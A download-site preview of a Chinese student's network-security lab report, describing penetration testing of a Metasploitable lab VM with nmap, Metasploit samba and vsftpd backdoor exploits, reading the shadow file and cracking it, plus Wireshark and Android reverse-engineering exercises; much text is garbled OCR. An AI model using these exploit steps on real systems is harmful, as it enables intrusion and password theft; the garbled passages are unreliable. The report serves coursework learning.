欢迎来到第壹文秘! | 帮助中心 分享价值,成长自我!
第壹文秘
全部分类
  • 幼儿/小学教育>
  • 中学教育>
  • 高等教育>
  • 研究生考试>
  • 外语学习>
  • 资格/认证考试>
  • 论文>
  • IT计算机>
  • 法律/法学>
  • 建筑/环境>
  • 通信/电子>
  • 医学/心理学>
  • ImageVerifierCode 换一换
    首页 第壹文秘 > 资源分类 > DOCX文档下载
    分享到微信 分享到微博 分享到QQ空间

    课程实验报告.docx

    • 资源ID:96685       资源大小:152.55KB        全文页数:10页
    • 资源格式: DOCX        下载积分:5金币
    快捷下载 游客一键下载
    账号登录下载
    三方登录下载: 微信开放平台登录 QQ登录
    下载资源需要5金币
    邮箱/手机:
    温馨提示:
    快捷下载时,如果您不填写信息,系统将为您自动创建临时账号,适用于临时下载。
    如果您填写信息,用户名和密码都是您填写的【邮箱或者手机号】(系统自动生成),方便查询和重复下载。
    如填写123,账号就是123,密码也是123。
    支付方式: 支付宝    微信支付   
    验证码:   换一换

    加入VIP,免费下载
     
    账号:
    密码:
    验证码:   换一换
      忘记密码?
        
    友情提示
    2、PDF文件下载后,可能会被浏览器默认打开,此种情况可以点击浏览器菜单,保存网页到桌面,就可以正常下载了。
    3、本站不支持迅雷下载,请使用电脑自带的IE浏览器,或者360浏览器、谷歌浏览器下载即可。
    4、本站资源下载后的文档和图纸-无水印,预览文档经过压缩,下载后原文更清晰。
    5、试题试卷类文档,如果标题没有明确说明有答案则都视为没有答案,请知晓。

    课程实验报告.docx

    等中科技火浮课程实验报告课程名称:网络空间安全综合实践山专业班级:学号:姓名:报告日期:2021625一、实验过程中遇到的问题和解决方法1.1. 渗透测试和流量分析本次实验分为渗透测试和流量分析两个部分。1.1.1. 渗透测试渗透测试实验主要是熟练运用发现漏洞和利用漏洞的命令。首先进行端口扫描来发现漏洞:nmap-T4-sV-v192.168.206.131FileActionsEditViewHaPNotshown:977closedportsIPORTSERVICEVERSION21/Up“PVSftpd2.3.422/UpSShOpenSSH.7lDebian8<buntul(protocol2.0)23/tcptel*t1.inuxtelnetd25cps«tpPostfixSlltPd53/tcpdonainISCBXNO9.4280/tcphttpApachehttpd2.2.8(Ubuntu)QAV2)lli/tcprpcbind2(RPClO0)139八CPetbios-ssnSabasnt>d3.X-4.X(workgroup:WORKGROUP)445/tCPnetbios-ssnSambasH>d3.X-4.X(workgroup:WORKGROUP)512/tcp“0Cnetkit-rshrexecd513/tcploginOponBSOorSolarisHogind5Utcptcpwrjpp«d1099/tcpava-raiGNUCUsspathgriregistry1524/tCpblrdsheUNetasploitablerootshell2049/tCpnfs2-(RPCffieM3)2ltcpHPProFTPO1.3.133MtcpMySQl5.e.51a-3ub<tu55432/tcpPOstsresqlPostgroSQ1.08.3.-8.1.759MtcpVnCVNC(protocol3.3)60MtcpXll(accessdenied)6667八CPireUnrealIRCd8009/tcpEP13ApacheJserv(Protocolvl.3)setcphttpAPJCheToncat/CoyoteJSPQgi1.1ServiceInfo:Hosts:MtasploitableaIocaldoaaintire.Nctasploitable.1.AN;OSs:Unixe1.inux;CPE:cpe:/o:linux:li(wx_kcrn«lReaddatafilesfro:usrbin.sharewMpServicedetectionXrfOredPleasereportanyincorrectresultsattt(>s:/nnap.orgsutit/.Nnapdone:1IPaddress(1hostup)scannedin12.29secondsTI从而发现SAMBAMS-RPCSHE1.1.命令注入漏洞。在执行漏洞攻击的过程中,我们先启动Metasploit,搜索有关samba漏洞的代码库:searchsamba然后使用USernIap_script代码,查看攻击载荷:useexploit/multi/samba/usermapscriptshowpayloads接着选择bindnetcat,即使用netcat工具在渗透攻击成功后执行shel1并通过netcat绑定在一个监听端口上:setpayloademd/unix/bindnetcat在查看参数配置后,设置目标ip、Port等参数:showoptionssetRHOST192.168.206.1315msf5>searchVSftPdMatchingModulesNameDisclosureDateRankCheckDescription0xploitunix/ftp/SBH.234.backdoor2011-07-03excellentNoVSFFPQv23.4BackdoorCoemandExecutionmsf5>useexploit/unix/ftp/vsftpd_23<backdoor(*jNopayloadconfigured,defaultingtocmd/unix/interactexploit()>showoptionsModuleoptions(exploitunixftpvsftpd_234-backdoor):NameCurrentSettingRequiredDescriptionRHOSTSysThetargethost(s)vrangeCIORIdentifierlorhostsfilewithsyntax,file<path>,RPORT21yesThetargetport(TCP)Payloadoptions(cmd/unix/interact):NameCurrentSettingRequiredDescriptionExploittarget:IdNane0AutOMticElfSexploit()>setRHOST192.168.206.131RHOST=192168.2G6.13】执行攻击exploit,输入vimetcshadow即获得shadow文件,之后使用hashcat跑出密码即得1.1.2.流量分析在流量分析实验中,主要问题在于如何找到流量包中的原始数据信息。采取的方法是对流量包进行过滤,通过=6200以及tcportcp-data对ftp和ftp-data包进行过滤:甥3:SJ:S:Ig:SJ:SM:7akc:$rC-2.2.>2.2.2.2.2.2.>2.2.2.2.2. 4:4C&X.) 密器匿匿也捻蠹M!s第&雳 讪曲瞄掾Is:M最温瓯型£需!Mll.fCV->*no 22d 7.1.4)ns gt >p: u PC I1: 1 SMltcaiM to Bury Mt QWTPgg»: 22 (r*fT 2.1.4) sc acwmrP3* *9*ciy th f*M* 19>r *xc*m1.KtCWU43(M:M:2T:«4:X«:4>)然后跟踪tcp流,获得原始数据后将数据保存。接着打开保存的tgz文件,发现passwd文件和shadow文件,从而根据文件中的数据进行破解。1.2.逆向分析本次逆向分析实验的整体难度相对较大,工作量也相对较多。这部分的实验的主要内容为流量分析、函数调用栈动态跟踪、函数参数动态跟踪和二进制代码分析。1.2.1.流量分析流量分析实验的主要问题在于借助Wireshark抓取Android模拟器中“同步助手”登录和同步数据时的流量,分析同步流量的数据特征,并根据这些特征,获取报文的一些信息,例如密文长度信息等。采取的方式是用wireshark对同步信息的过程进行抓包,同步信息完成后停止抓包。设置过滤内容为dns,观察到的ip地址为113.96.237.110:aS-eq*>iz.X0C3Jl4.fTlMSve*MIIMttM*t*llflctkX221.92101510.12.168.?202.114.1?1CKS77Stenderdq<ry0x956bAvp55>rc.X.qq.c<n231.924421202.11A.0.13110.U.U8.83MS1»Standardqeryresponsex93Anpssync.3g.<M.c<nA113.96.237.11÷A183.3.225.36设置过滤内容为ip.addr=113.96.237.110,观察报文。可以得出源地址为10.12.176.16,端口13733;目的地址为113.96.237.110,端口14000:lelellell.»,»7.1九.n九 a九 ltll1.551.tL*M3 .H.Hu.d.Hdd.HdJ lDlDle.0lDmmlDi«.la.三eIi1 ,r*% ; i He F叼滞k 目 5i5 M)eew>u加 “Mt=*.M:U 6 wlr Htc)f M M* rjrt*r*l <%X H««) 6. >< rMiFv.2<t>4S出,0NS* DKl k,lZ.59":"Ig:自)IntbF Frcccol rU8 4, Wi l.12.l6t.t). DKi 1D.M.297.1.>2M387ATa;口8:二:方14M: WMXM:86IG = 3 C 二 M追踪tcp流,并以16进值查看,得出数据加密类型是分组加密。1.2.2.函数调用栈动态跟踪函数调用栈动态跟踪实验的主要问题在于分析出PC端与模拟器端连接的端口是多少。使用AndrOidkiller打开要分析的文件得知包名为nt.pim找到并运行,得出nt.pim的调试端口为8605,DDMS的接收信息端口为87006De5e OQNamtacom.tBrK«nt/nobft»qqA4 SF60488601CfrundroidJc<y<ha18898602COmUndrdIdohQne157086034n(jrol4<xU4rvfces18268604Conxtancentqqpim75558605 /0700coffMndroWJnutnwthodpln0202086064ndro2d4>rocsscorv21808607C8MnrddSymmur15758608ConXandroid JaUnCbtr318678609CorrundEdfysnhigrrrdWdOMiSWr 20648610ConMndrOfdMy 如 kworm19698611conrndr0*dvbvvMbvwa.ftrc0 28018612'Sadms284¾39658213377ceDUt>w42SHW<i tfm, dual clock)26502.700 2750 2.9002 JcMPcfTMdro),d4ry3d46928613systsmjxocftss14328614<frundro(d4)ftspoo<19168615CorrutarKen1.sscuredawnloadjervke76448616<fttftotnobneqq77408617coxandro2d4ttihgs16308618(orYMfJro½oreserv

    注意事项

    本文(课程实验报告.docx)为本站会员(p**)主动上传,第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。 若此文所含内容侵犯了您的版权或隐私,请立即通知第壹文秘(点击联系客服),我们立即给予删除!

    温馨提示:如果因为网速或其他原因下载失败请重新下载,重复下载不扣分。




    关于我们 - 网站声明 - 网站地图 - 资源地图 - 友情链接 - 网站客服 - 联系我们

    copyright@ 2008-2023 1wenmi网站版权所有

    经营许可证编号:宁ICP备2022001189号-1

    本站为文档C2C交易模式,即用户上传的文档直接被用户下载,本站只是中间服务平台,本站所有文档下载所得的收益归上传人(含作者)所有。第壹文秘仅提供信息存储空间,仅对用户上传内容的表现方式做保护处理,对上载内容本身不做任何修改或编辑。若文档所含内容侵犯了您的版权或隐私,请立即通知第壹文秘网,我们立即给予删除!

    收起
    展开